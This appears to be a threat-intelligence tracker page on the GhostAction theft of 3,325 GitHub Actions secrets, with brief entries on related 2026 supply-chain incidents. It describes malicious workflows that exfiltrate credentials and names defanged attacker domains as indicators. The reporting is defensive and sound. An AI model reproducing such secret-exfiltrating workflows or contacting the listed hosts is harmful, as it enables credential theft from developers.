GhostAction GitHub repository secrets leak
Data Leak
Summary
Hide ▲
Show ▼
A GhostAction credential-theft operation exposed 3,325 secrets from GitHub repositories, creating immediate risk of package compromise and account abuse. The theft reached GitHub Actions environments, where malicious workflows pulled tokens, keys, and database credentials into an attacker-controlled endpoint. The compromise first surfaced in FastUUID on September 2, 2025, then expanded across at least 817 repositories. The exposed material included secrets tied to PyPI, npm, DockerHub, GitHub, Cloudflare, and AWS accounts.
Related Happenings
Lightning PyPI router_runtime.js credential-stealing payload
Malware Activity
First: 30.04.2026 19:31
Last: 30.04.2026 19:31
Sources 1
About this happening:
The **Lightning** PyPI package was pushed in **malicious versions 2.6.2 and 2.6.3** on **April 30, 2026**, turning a normal install into **credential theft** for **developer and C...
Lightning PyPI router_runtime.js credential-stealing payload
Malware ActivityAbout this happening: The **Lightning** PyPI package was pushed in **malicious versions 2.6.2 and 2.6.3** on **April 30, 2026**, turning a normal install into **credential theft** for **developer and C...
Latest development: 04.05.2026 20:15
Microsoft Threat Intelligence says Defender detected and prevented the malicious `lightning==2.6.3` routine in customer environments, notified the Lightning maintainer, and warned that users who ran `import lightning` may need to rotate exposed secrets, keys, and tokens.
Mini Shai-Hulud SAP-related npm supply-chain campaign
Campaign
First: 29.04.2026 19:26
Last: 29.04.2026 19:26
Sources 1
About this happening:
A new **Mini Shai-Hulud** supply-chain campaign is targeting **SAP-related npm packages**, putting **developer and CI/CD environments** at risk of credential theft and malicious p...
Mini Shai-Hulud SAP-related npm supply-chain campaign
CampaignAbout this happening: A new **Mini Shai-Hulud** supply-chain campaign is targeting **SAP-related npm packages**, putting **developer and CI/CD environments** at risk of credential theft and malicious p...
Latest development: 12.05.2026 11:50
Mini Shai-Hulud expands beyond the original SAP-related npm packages to compromise TanStack, UiPath, Mistral AI, OpenSearch, Guardrails AI, and DraftLab packages across npm and PyPI, with malicious payloads using router_init.js, GitHub Actions abuse, and exfiltration to filev2.getsession[.]org, api.masscan[.]cloud, or attacker-controlled GitHub repositories.
GitHub git push RCE (CVE-2026-3854)
Vulnerability
First: 29.04.2026 15:41
Last: 29.04.2026 15:41
Sources 1
About this happening:
GitHub patched **CVE-2026-3854**, a critical **remote code execution** flaw affecting **GitHub.com** and **GitHub Enterprise Server** that could expose **millions of private repos...
GitHub git push RCE (CVE-2026-3854)
VulnerabilityAbout this happening: GitHub patched **CVE-2026-3854**, a critical **remote code execution** flaw affecting **GitHub.com** and **GitHub Enterprise Server** that could expose **millions of private repos...
Elementary-data package hit by network compromise
Incident
First: 27.04.2026 18:17
Last: 27.04.2026 18:17
Sources 1
About this happening:
The **elementary-data** project suffered a **malicious release compromise** that exposed users of **PyPI** and **GitHub Container Registry** to a backdoored package and image. An...
Elementary-data package hit by network compromise
IncidentAbout this happening: The **elementary-data** project suffered a **malicious release compromise** that exposed users of **PyPI** and **GitHub Container Registry** to a backdoored package and image. An...
Developer environments using KICS data exposed after Checkmarx breach
Data Leak
First: 23.04.2026 19:05
Last: 23.04.2026 19:05
Sources 1
About this happening:
The compromised **Checkmarx KICS** toolchain was used to exfiltrate **GitHub tokens**, **cloud credentials**, and other secrets from developer environments, creating immediate acc...
Developer environments using KICS data exposed after Checkmarx breach
Data LeakAbout this happening: The compromised **Checkmarx KICS** toolchain was used to exfiltrate **GitHub tokens**, **cloud credentials**, and other secrets from developer environments, creating immediate acc...
Timeline
-
08.09.2025 22:53 1 articles · 8mo ago
GhostAction compromises FastUUID secrets through a malicious GitHub Actions workflow
Detection Ioc UpdateGitGuardian identified the first signs of compromise in FastUUID on September 2, 2025 after compromised maintainer accounts had added a malicious GitHub Actions workflow that triggered on push or manual dispatch and exfiltrated secrets from the project's GitHub Actions environment to an attacker-controlled domain.
Show sources
- Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack — www.bleepingcomputer.com — 08.09.2025 22:53
-
08.09.2025 22:53 2 articles · 8mo ago
GhostAction reaches at least 817 repositories and GitGuardian notifies package ecosystem teams
Campaign Scope UpdateGitGuardian determined that GhostAction had expanded beyond FastUUID to at least 817 repositories, and on September 5, 2025 it opened GitHub issues in 573 impacted repositories while directly notifying the security teams of GitHub, npm, and PyPI; the campaign had already stolen roughly 3,325 secrets across package ecosystems.
Show sources
- Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack — www.bleepingcomputer.com — 08.09.2025 22:53
- Hackers steal 3,325 secrets in GhostAction GitHub supply chain attack — www.bleepingcomputer.com — 08.09.2025 22:53